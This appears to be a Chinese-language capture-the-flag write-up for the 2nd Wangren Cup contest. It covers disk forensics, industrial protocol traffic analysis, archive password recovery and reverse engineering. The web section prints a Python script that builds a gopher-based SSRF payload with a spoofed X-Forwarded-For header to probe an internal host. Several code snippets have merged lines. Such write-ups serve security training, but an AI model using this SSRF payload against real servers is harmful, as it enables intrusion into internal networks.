第二届网刃杯网络安全大赛 Writeup

  • 前言
  • MISC
    • 玩坏的XP *
  • ISC
    • ncsubj
    • carefulguy
    • easyiec
    • xypo7
    • 喜欢移动的黑客*
    • LED_BOOM*
    • 需要安全感*
    • cryptolalia*
  • WEB
    • Sign_in
  • RE
    • freestye
    • ez_algorithm
    • Re_function

前言

看了去年的这个比赛,感觉难度比较适中,于是尝试今年去参加一下。成绩也不是很好感觉打CTF还是需要一定的经验,节奏和时间没安排好,导致上午出了五个题后下午就再没出题,有点小遗憾。取证题也没出…还是得多看看套神博客。

MISC

玩坏的XP *

解压后发现是虚拟磁盘文件,使用DiskGenius挂载后分析。
查看桌面有五张图片。看meiren.png就感觉有点问题,提取出来进行查看。



使用formost分解图片,发现能分解出压缩包和图片,图片里有两张meiren图,压缩包解压出来之后是一张not flag的图片,继续分解no flag的图片。得到一个压缩包但是需要密码,但是我这里居然没有提醒,提醒的文件上写着:密码容易忘所以放在了某个挂着项链的软件上了


这里没有安装过QQ所以查看是否还有其他的软件符合他的要求。

这里找到了火狐浏览器的位置,看到了几个QQ的相关信息还以为是需要我们再里面找,实际上是要我们再places.sqlit中找相关的信息,导出该数据,使用软件来查看里面的数据库数据。

下一个即可,进行查看。

直接查看相关的QQ号,查看QQ空间。

密码MD5之后的样子,在线解密即可。
得到xiaomin520,然后解压压缩包即可拿到flag。

ISC

ncsubj


跟踪协议流

拿出来base64解码后,去掉|再来一次解密即可。

carefulguy


跟踪流:7d开始

66结束

提取出来hex解码,逆序即可。

easyiec


字符串搜索,即可。


xypo7


直接解压文件发现需要密码,查看文件末尾有附加数据,发现是base64的形式。

提取出来不断base64解码即可拿到密码。Xyp77&7&77,然后发现奇怪的数据,直接解码base91。

喜欢移动的黑客*

pcapng流量包头部损坏,把FF FF FF FF改成 0A 0D 0A 0D即可打开。哎这个题没出实着可惜,我还一直以为pcap和pcapng是一种数据结构,当时脑抽了没有看前面的文件格式,按照pcap的格式去改发现一直不对。改完之后直接所定数据data即可。

就几个数据包,一个一个看即可。


flag{1008668156}

LED_BOOM*

这个题也是找不到具有三个相同特征的流量包,没看到开灯的操作记录。花了挺多的时间。
mouchu师傅博客上写着过滤西门子协议后按照包的大小来找会更快一些,经验比较短缺一时想不到这样来找。

查看内容包:

于是这三个包加起来就是:585692787
密文给出的是:

AES解密:


需要安全感*

这个是三菱的一个文件 按照我做题前的感觉是下了软件之后直接在里面就就可以找到flag 但是比赛结束了软件还没下好。套神WP证明确实是这个思路。G…

cryptolalia*


给了一张工业的污水处理过程,简单查看了一下直接分解图片。

查看污泥脱水间数据详情.zip,官方hint:直接爆破即可,数字加大写字母爆破。
得到密码:G6H7
查看里面的流量包,发现有经过对称加密算法加密的字符串。

U2FsdGVkX19pczQKWsMcjgrJt8f09dSN
官方给出的提示:鱼 is very important,那么密钥就是fish了,一个一个尝试需要密码的加密即可拿到下一个压缩包的解压密码。
解密网站:对称加密网址


b0Le4n$
继续解压下一个压缩包,解压出来之后发现还有一个压缩包,发现还需要密码,使用十六进制查看器查看数据。
改为00即可。

然后查看西门子的协议,跟踪流后发现有图像数据想办法提取出来。


参考链接:套神博客
提取方式:tshark -r .\设备药剂间数据采集.pcap -T fields -e s7comm.resp.data -Y s7comm > pic.txt

# 已经去除了前后的数据
import binasciihexdata = ""
with open("pic.txt","r") as file:hexdata = file.read().split()
hexdata = "".join(hexdata)
print(hexdata[0:16])with open("png.png","wb") as file2:file2.write(binascii.unhexlify(hexdata))

把这个放到图片中即可。

使用010修改高度即可。

WEB

Sign_in


签到题都ssrf了,哎~。
ssrf结合gopher打内网,进行内网探测。

***

import urllib.parse
url='http://124.222.24.150:8091/?url='
ctf=\
"""POST /?a HTTP/1.1
Host: 172.73.23.100:80
X-Forwarded-For:127.0.0.1
Referer:bolean.club
Content-Type:application/x-www-form-urlencoded
Content-Length:1
b
"""
tmp = urllib.parse.quote(ctf)
new = tmp.replace('%0A','%0D%0A')
res = '_'+new
res=urllib.parse.quote(res)
exp='gopher://172.73.23.100:80/'+res
print(exp)

RE

freestye

逆回去看一下两个函数,分别队输入的字符串使用atoc函数转化尾数字 然后与后面的值进行比对,简单的数据计算即可拿到结果。



手算第一个:3327 第二个:105 MD5后即可。

ez_algorithm


是个比较复杂的,但是是可以爆破的,每一位都和动调时的相同,这样就爆出了,算是个非预期吧。
rax中有:

Re_function


发现不能解压,但是给出了一张图片的数据估计密码就在上面。将数据写入一张图片即可。

import binasciihexdata = ""
with open("png.txt","r") as file:hexdata = file.read().split()
hexdata = "".join(hexdata)
print(hexdata[0:16])with open("png.png","wb") as file2:file2.write(binascii.unhexlify(hexdata))
#3CF8

有两个文件,一个是32为exe,另一个是64为的elf文件

exe文件直接看c伪代码没看懂感觉好乱看不懂,直接看汇编吧。
然后经过一整调试发现,是将我们输入的奇数位与0x37异或然后得到了一串字符。

然后看elf文件,魔改的base64算法,只换了字符串表然后解即可。
flag{we1come_t0_wrb}

第二届网刃杯网络安全大赛 Writeup相关推荐

  1. 2022第二届网刃杯网络安全大赛-Web

    2022第二届网刃杯网络安全大赛-Web 前言 提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭! 一.Web2-upload 难度系数:4.0 题目描述:只有想不到,没有做不到,sql yy ...

  2. 2022第二届网刃杯网络安全大赛-Re

    2022第二届网刃杯网络安全大赛-Re 前言 提示:该内容由夜刃TEOT战队-rootkit师傅原创,禁止抄袭! 一.RE1-ez_algorithm? 难度系数:5.0 题目描述:就是玩!!! 输入 ...

  3. 2022第二届网刃杯网络安全大赛-ICS

    2022第二届网刃杯网络安全大赛-ICS 前言 提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭! 一.ICS1-ncsubj 难度系数:4.0 题目描述:wowowow,某厂商上位机TIA ...

  4. 2022第二届网刃杯网络安全大赛

    目录 前言 一.ICS1-ncsubj 二.ICS2-carefulguy 三.ICS3-喜欢移动的黑客 四.ICS4-easyiec 五.ICS5-xyp07

  5. 2021第一届网刃杯网络安全大赛-老练的黑客

    2021第一届网刃杯网络安全大赛-老练的黑客 难度系数:4.0 题目描述:一黑客成功入侵某核电站且获得了操作员站控制权,该操作员站可控制离心机的转速,当离心机的转速持续高于5000时将导致设备损坏,为 ...

  6. 首届“网刃杯”网络安全大赛部分WP

    这是之前打比赛写的WP,供大家参考 藏在S7里的秘密 1.修复流量包 下载流量包打开后发现提示错报 The file"S7.pcap" isn't a capture file i ...

  7. 第二届网刃杯 ICS+Misc wp

    文章目录 ICS LED_BOOM carefulguy 喜欢移动的黑客 easyiec xyp07 需要安全感 cryptolalia Misc 玩坏的winxp ICS LED_BOOM 一段对称 ...

  8. 2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup

    2020年第二届"网鼎杯"网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download ...

  9. [ CTF ]【天格】战队WriteUp- 2022年第三届“网鼎杯”网络安全大赛(青龙组)

    2022年第三届"网鼎杯"网络安全大赛(青龙组)部分题目附件 已解题列表 [Misc]签到 [Crypto]crypto405 [Crypto]crypto091 [Pwn]pwn ...

最新文章

  1. java下载zip_从Servlet Java下载zip
  2. 在同一基准下对前端框架进行比较(2019年更新)
  3. Spring Data 系列(二) Spring+JPA入门(集成Hibernate)
  4. VBA操作word生成sql语句
  5. Linux C解析命令行参数代码
  6. linux下mysql的忘记root密码的解决办法
  7. 迪杰斯特拉算法c语言实现
  8. 命令杀mysql进程
  9. 单元测试用例设计原则
  10. 浅谈人工智能 | 语音识别面面观
  11. Knowledge Representation笔记
  12. Basic SRVCC 基本SRVCC 信令流程
  13. Kubernetes 健康状态检查(九)
  14. RF信号下采样/矩阵下采样(附python实现代码)
  15. python地址怎么写_python文件地址(文件路径)怎么写
  16. Mac 上必备的常用软件,你值得拥有
  17. 【下载!】免费经典的计算机教学视频,向孙鑫老师致敬!
  18. WordCloud生成卡卡西忍术词云
  19. 【AI视野·今日NLP 自然语言处理论文速览 第二十三期】Tue, 28 Sep 2021
  20. Paradigms Homework1 一个超小型二元一次方程组计算器

热门文章

  1. MATLAB高精度计算开源工具箱【全网首发windows版】
  2. DES加密之强制更新下载分离器
  3. 安卓apk在CentOS上自动化编译打包发布
  4. Thinkphp--Auth权限控制
  5. reactos操作系统实现(1)
  6. 班班通计算机工作总结,初中班班通培训工作总结
  7. Error retrieving https://nvd.nist.gov/feeds/json/cve/1.0/nvdcve-1.0-modified.meta; received 404
  8. 基于纷享销客开放平台,实现纷享CRM与金蝶云星空系统数据同步
  9. ODATA入门:Association 和 Navigation实现(GET_EXPANDED_ENTITY)
  10. 阿里Java岗二面:Redis了解?说说持久化机制及RDB/AOF应用场景分析